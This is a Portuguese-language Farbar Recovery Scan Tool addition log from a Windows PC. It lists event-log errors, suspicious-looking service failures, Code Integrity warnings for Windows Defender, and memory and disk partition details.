Description: Nome do aplicativo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Nome do módulo com falha: spbia.exe, versão: 1.0.0.4, carimbo de data/hora: 0x56dc16b3
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000003f81
ID do processo com falha: 0xeb8
Hora de início do aplicativo com falha: 0xspbia.exe0
Caminho do aplicativo com falha: spbia.exe1
Caminho do módulo com falha: spbia.exe2
ID do Relatório: spbia.exe3
Nome completo do pacote com falha: spbia.exe4
ID do aplicativo relativo ao pacote com falha: spbia.exe5

Error: (03/07/2016 06:13:08 AM) (Source: ESENT) (EventID: 104) (User: )
Description: SearchIndexer (3796) Windows: O mecanismo de banco de dados interrompeu a instância (0) com erro o (-510).



Sequência Interna de Intervalos: [1] 0.000, [2] 0.000, [3] 0.032, [4] 0.000, [5] 0.968, [6] 0.016, [7] 0.000, [8] 0.000, [9] 0.047, [10] 0.000, [11] 0.000, [12] 0.000, [13] 0.000, [14] 0.000, [15] 0.000.

Error: (03/07/2016 06:13:06 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: O serviço Pesquisa do Windows está sendo interrompido devido a um problema no indexador:The catalog is corrupt.

Detalhes:
O catálogo do índice de conteúdo está corrompido. 0xc0041801 (0xc0041801)


Erros de Sistema:
=============
Error: (03/07/2016 04:41:18 PM) (Source: Schannel) (EventID: 4120) (User: AUTORIDADE NT)
Description: Um alerta fatal foi gerado e enviado ao ponto de extremidade remoto. Isso pode resultar no término da conexão. O código de erro fatal definido do protocolo TLS é 10. O estado de erro do Windows SChannel é 10.

Error: (03/07/2016 03:57:56 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Update Primary Color devido ao seguinte erro:
%%1053

Error: (03/07/2016 03:57:56 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a conexão do serviço Update Primary Color.

Error: (03/07/2016 03:57:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Util Primary Color devido ao seguinte erro:
%%2

Error: (03/07/2016 03:57:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Update Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 03:57:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Util Primary Color foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 5000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 03:42:00 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: O desligamento do sistema que ocorreu às 13:08:05 do dia ‎07/‎03/‎2016 não era esperado.

Error: (03/07/2016 01:15:53 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço qEHckHCOjvx foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 60000 milissegundos: Reiniciar o serviço.

Error: (03/07/2016 01:06:35 PM) (Source: DCOM) (EventID: 10010) (User: FELIPE)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (03/07/2016 01:06:35 PM) (Source: DCOM) (EventID: 10010) (User: FELIPE)
Description: {9AA46009-3CE0-458A-A354-715610A075E6}


CodeIntegrity:
===================================
Date: 2016-03-07 15:55:52.555
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 15:55:49.289
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 15:55:45.977
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:29:04.182
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:57.577
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:53.660
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:49.889
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:37.886
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:28:27.301
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-03-07 13:27:47.311
Description: Code Integrity determined that a process (\Device\HarddiskVolume1\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume1\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Informações da Memória ===========================

Processador: Intel(R) Atom(TM) CPU N550 @ 1.50GHz
Percentagem de memória em uso: 84%
RAM física total: 2038.11 MB
RAM física disponível: 319.64 MB
Virtual Total: 2742.11 MB
Virtual disponível: 629.43 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:115 GB) (Free:60.21 GB) NTFS ==>[drive com componentes de inicialização (obtido através de BCD)]
Drive e: () (Fixed) (Total:350.74 GB) (Free:48.1 GB) NTFS

==================== MBR & Tabela de Partições ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 40DDCAEF)
Partition 1: (Active) - (Size=115 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=350.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16 MB) - (Type=EF)

==================== Fim de Addition.txt ============================
